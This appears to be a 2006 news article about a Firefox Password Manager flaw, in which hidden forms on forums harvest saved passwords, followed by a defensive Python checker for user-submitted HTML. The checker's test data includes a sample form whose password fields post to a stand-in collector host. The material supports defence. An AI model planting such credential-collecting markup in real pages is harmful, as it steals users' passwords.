How to exploit Mozilla Firefox

Are you one of those people who lets Firefox save your passwords so you don’t have to type them in again?
Chapin Information Services (CIS) has discovered a new flaw in the Mozilla Firefox web browser that exposes saved passwords using a Reverse Cross-Site Request (RCSR) vulnerability.
The vulnerability could affect anyone visiting a weblog or forum website that allows user-contributed HTML code to be added.

“RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed,” says Chapin on his site.
“The Password Manager component of Firefox can be exploited to send a username and password combination to an attacker’s computer without the user’s knowledge. Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.
“A recent large-scale attack using RCSR targeted MySpace.com users and was first reported by Netcraft 10/27/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password.”
A recent large-scale RCSR attack targeting MySpace.com involved fake login forms on the MySpace website inviting users to type in their username and password.

Chapin says the problem is made worse by the fact that forms can be completely hidden from view.
After saving a website password in Firefox, it’s possible for that password to be transmitted to another website by unwittingly clicking on an invisible image link, he says, adding:
“Mozilla confirmed this as bug number 360493, and said they are already working on a fix for version 2.0.0.1 or 2.0.0.2.”
A proof-of-concept demonstration is available here.
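
For a blog or forum that accepts user-contributed HTML, one server-side check is to refuse form markup in a submission before it is published. The Python below is an added example, not code from CIS or Mozilla; the function names, the `forum.example` host and the sample submissions are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that let submitted markup build a form the password manager may fill.
FORM_TAGS = {"form", "input", "button", "select", "textarea"}

class FormAudit(HTMLParser):
    """Collect form-related findings from one piece of user-contributed HTML."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in FORM_TAGS:
            self.findings.append(("form-control", tag))
        # action/formaction decide where the filled-in values are sent.
        for attr in ("action", "formaction"):
            try:
                host = (urlparse(a.get(attr, "")).hostname or "").lower()
            except ValueError:  # malformed URL: report it instead of crashing
                self.findings.append(("unparseable-action", a[attr]))
                continue
            if host and host != self.site_host:
                self.findings.append(("cross-site-action", host))
        if tag == "input" and a.get("type", "").strip().lower() == "password":
            self.findings.append(("password-field", a.get("name", "")))

def audit_user_html(html, site_host):
    """Return a list of (finding, detail) tuples; empty means no form markup."""
    parser = FormAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

def is_safe_to_publish(html, site_host):
    return not audit_user_html(html, site_host)

# Constructed sample submissions (not taken from the page or the PoC).
BENIGN = '<p>Nice post! <a href="https://example.org/">source</a></p>'
SUSPECT = ('<form action="https://collector.example/c">'
           '<input name="user"><input type="password" name="pass"></form>')

if __name__ == "__main__":
    for label, html in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, audit_user_html(html, "forum.example"))
```

Any finding blocks publication, including a form with a relative action, because the browser fills saved credentials based on the site hosting the page; the cross-site and password-field findings are there for triage.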

Chapin recently reported on a MySpace vulnerability which allowed music files to be downloaded anonymously and identified a gaping hole in Yahoo’s music sales site.
